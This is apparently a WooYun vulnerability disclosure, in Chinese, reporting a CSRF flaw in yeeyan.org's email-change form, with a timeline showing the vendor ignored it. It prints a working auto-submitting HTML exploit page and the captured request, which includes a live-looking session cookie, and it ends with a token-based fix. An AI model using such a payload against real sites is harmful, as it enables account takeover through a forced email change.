乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-12-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-01-23: 厂商已经主动忽略漏洞,细节向公众公开
由于网页表单验证不严格,导致可以提交恶意用户信息,网站用户面板中有一个功能是更换用户邮箱,这个表单可以被恶意提交不属于当前用户的邮件地址。
<html><H2>CSRF Exploit to add </H2><body> <form accept-charset="utf-8" method="POST" action="http://member.yeeyan.org/my/profile/email?" name="form0" enctype="multipart/form-data"><input type="text" name="data[email]" value="[email protected]" /></form><script type="text/javascript">document.form0.submit();</script></body></html>
提交伪造数据的header 信息。
Request URL:http://member.yeeyan.org/my/profile/email?Request Method:POSTStatus Code:200 OKRequest Headersview sourceAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Charset:UTF-8,*;q=0.5Accept-Encoding:gzip,deflate,sdchAccept-Language:zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cache-Control:max-age=0Connection:keep-aliveContent-Length:157Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryUBhOCXRqb1cABfRZCookie:PHPSESSID=f6568962a1aafdfbf5719fa5d3400910; CakeCookie[ykey]=368997; __utma=68569166.1733295180.1354628709.1354813506.1354995318.3; __utmb=68569166.11.10.1354995318; __utmc=68569166; __utmz=68569166.1354813506.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E8%AF%91%E8%A8%80Host:member.yeeyan.orgOrigin:http://member.yeeyan.orgReferer:http://member.yeeyan.org/my/profile/emailUser-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17Request Payload------WebKitFormBoundaryUBhOCXRqb1cABfRZContent-Disposition: form-data; name="data[email]"[email protected]------WebKitFormBoundaryUBhOCXRqb1cABfRZ--Response Headersview sourceConnection:keep-aliveContent-Encoding:gzipContent-Type:text/htmlDate:Sat, 08 Dec 2012 19:44:04 GMTP3P:CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"Server:nginx/0.8.47Transfer-Encoding:chunkedVary:Accept-EncodingX-Powered-By:PHP/5.2.14
在表单中放置token,提交的时候从服务端验证。
未能联系到厂商或者厂商积极拒绝